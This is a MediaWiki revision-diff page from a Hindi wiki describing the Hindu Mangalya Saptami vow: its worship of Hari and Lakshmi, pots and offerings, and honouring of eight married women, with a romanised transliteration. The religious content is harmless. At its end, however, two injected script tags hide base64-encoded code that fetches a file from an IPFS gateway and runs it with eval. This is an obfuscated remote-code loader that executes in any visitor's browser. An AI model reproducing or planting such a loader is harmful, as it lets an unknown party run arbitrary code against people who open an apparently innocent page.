Difference between revisions of "मांगल्य सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[सप्तमी]] पर; एक वर्गाकार मण्डप पर [[विष्णु|हरि]] एवं [[लक्ष्मी]] का आवाहन तथा पुष्पों आदि से पूजा की जाती है।  
 
*[[सप्तमी]] पर; एक वर्गाकार मण्डप पर [[विष्णु|हरि]] एवं [[लक्ष्मी]] का आवाहन तथा पुष्पों आदि से पूजा की जाती है।  
*मिट्टी, ताम्र, चाँदी एवं सोने के चार पात्र रखकर; मिट्टी के चार घटों को वस्त्र से ढँककर उनमें, नमक, तिल एवं हल्दी का चूर्ण रखना चाहिए।
+
*मिट्टी, ताम्र, चाँदी एवं सोने के चार पात्र रखकर।
 +
*मिट्टी के चार घटों को वस्त्र से ढँककर उनमें, नमक, तिल एवं हल्दी का चूर्ण रखना चाहिए।
 
*आठ सधवा, चरित्रवती तथा पुत्रवती नारियों को सम्मानित कर उन्हें दक्षिणा देना और उनकी उपस्थिति में मांगल्य (शुभ जीवन) के लिए हरि से प्रार्थना तथा उन्हें विदा करना चाहिए।  
 
*आठ सधवा, चरित्रवती तथा पुत्रवती नारियों को सम्मानित कर उन्हें दक्षिणा देना और उनकी उपस्थिति में मांगल्य (शुभ जीवन) के लिए हरि से प्रार्थना तथा उन्हें विदा करना चाहिए।  
 
*[[अष्टमी]] पर पुनः हरि पूजा तथा आठ युवतियों को भोजन देना तथा [[पारण]] करना चाहिए।  
 
*[[अष्टमी]] पर पुनः हरि पूजा तथा आठ युवतियों को भोजन देना तथा [[पारण]] करना चाहिए।  
*सभी की पुरुष या नारी, राजकुमारी हो या कृषक, कामनाएँ पूर्ण होती हैं; <ref>हेमाद्रि (व्रत0 1, 768-770)</ref>
+
*सभी की पुरुष या नारी, राजकुमारी हो या कृषक, कामनाएँ पूर्ण होती हैं।<ref>हेमाद्रि (व्रत0 1, 768-770</ref>
  
  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:57, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • saptami par; ek vargakar mandap par hari evan lakshmi ka avahan tatha pushpoan adi se pooja ki jati hai.
  • mitti, tamr, chaandi evan sone ke char patr rakhakar.
  • mitti ke char ghatoan ko vastr se dhankakar unamean, namak, til evan haldi ka choorn rakhana chahie.
  • ath sadhava, charitravati tatha putravati nariyoan ko sammanit kar unhean dakshina dena aur unaki upasthiti mean maangaly (shubh jivan) ke lie hari se prarthana tatha unhean vida karana chahie.
  • ashtami par punah hari pooja tatha ath yuvatiyoan ko bhojan dena tatha paran karana chahie.
  • sabhi ki purush ya nari, rajakumari ho ya krishak, kamanaean poorn hoti haian.[1]



tika tippani aur sandarbh

  1. hemadri (vrat0 1, 768-770

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>